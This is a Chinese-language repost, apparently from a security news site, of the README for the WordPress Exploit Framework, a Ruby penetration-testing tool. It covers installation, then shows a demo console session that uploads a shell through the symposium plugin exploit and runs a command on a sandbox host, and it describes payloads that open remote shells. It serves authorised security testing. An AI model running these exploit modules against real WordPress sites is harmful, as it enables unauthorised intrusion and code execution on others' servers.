安全圈 | 专注于最新网络信息安全讯息新闻

首页

github

作者 galluppi 时间 2020-02-27
all

一個Ruby框架,旨在幫助WordPress系統的滲透測試。

安裝

要安裝最新的穩定版本,請運行gem install wpxf。

gem install wpxf

安裝後,您可以通過運行wpxf啟動WordPress利用框架控制台。

wpxf

我需要什麼來運行它?

運行WordPress漏洞攻擊框架需要Ruby>=2.4.4。

安裝故障排除

Debian系統

如果您在安裝WPXF的依賴項(特別是Nokogiri)時遇到問題,請首先確保您擁有編譯C擴展所需的所有工具:

sudo apt-get install build-essential patch

您的系統上可能沒有安裝重要的開發標頭檔。如果你遇到這種情況,你應該做以下幾點:

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev

Windows系統

如果遇到訓示無法加載libcurl.dll的錯誤,則需要確保最新的libcurl二進位檔案包含在Ruby bin資料夾或環境的PATH變數中的任何其他資料夾中。

libcurl.dll

最新版本可從http://curl.haxx.se/download.html下載。截至2016年5月16日,最新版本標記為Win32 2000/XP zip 7.40.0 libcurl SSL。下載存檔檔案後,將bin目錄的內容選取到Ruby bin目錄中(如果出現提示,請不要覆蓋任何現有的dll)。

Win32 2000/XP zip 7.40.0 libcurl SSL

我怎麼用?

通過運行wpxf啟動WordPress利用框架控制台。

wpxf

加載後,將顯示wpxf提示,從這裡可以使用search命令蒐索模塊或使用use命令加載模塊。

search use

將模塊加載到您的環境中將允許您使用set命令設定選項,並使用info查看有關模塊的資訊。

set info

下麵是一個示例,說明如何加載Symmission_shell_upload exploit模塊,設定模塊和負載選項,並針對目標運行攻擊。

wpxf > use exploit/shell/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/shell/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/shell/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully

有關受支持命令的完整清單,請查看此Wiki頁面。

輔助模塊和利用模塊有什麼區別?

輔助模塊不允許您在目標電腦上運行有效負載,而是允許您從目標電腦中選取資訊、提升許可權或提供拒絕服務功能。

利用漏洞模塊要求您指定一個負載,該負載隨後在目標電腦上執行,允許您運行任意程式碼從電腦中選取資訊、建立遠程shell或在web服務器上下文中執行任何其他操作。

有哪些有效載荷?

除custom和Meterpreter有效負載外,所有這些有效負載在執行後都將删除它們自己,以避免在使用後或在使用它們建立shell失敗時將它們留在目標電腦上。

custom

如何編寫自己的模塊和有效負載?

有關編寫模塊和有效負載的指南可以在Wiki上找到,API的完整檔案可以在https://rastating.github.io/wordpress-exploit-framework上找到

許可證

版權所有(C)2015-2018 rastating

未經雙方同意對網站運行WordPress漏洞攻擊框架在您的國家可能是非法的。作者和參與開發的各方不承擔任何責任,也不對WordPress利用框架造成的任何誤用或損壞負責。

此程式是自由軟體:您可以根據自由軟體基金會發佈的GNU通用公共許可證(許可證的第3版或(由您選擇)任何更高版本)的條款重新分發和/或修改它。

這個程式的發佈是希望它會有用,但沒有任何保證;甚至沒有對適銷性或特定用途的適用性的暗示保證。有關更多詳細資訊,請參見GNU通用公共許可證。

您應該已經收到一份GNU通用公共許可證的副本和這個程式。如果沒有,請參閱http://www.gnu.org/licenses/。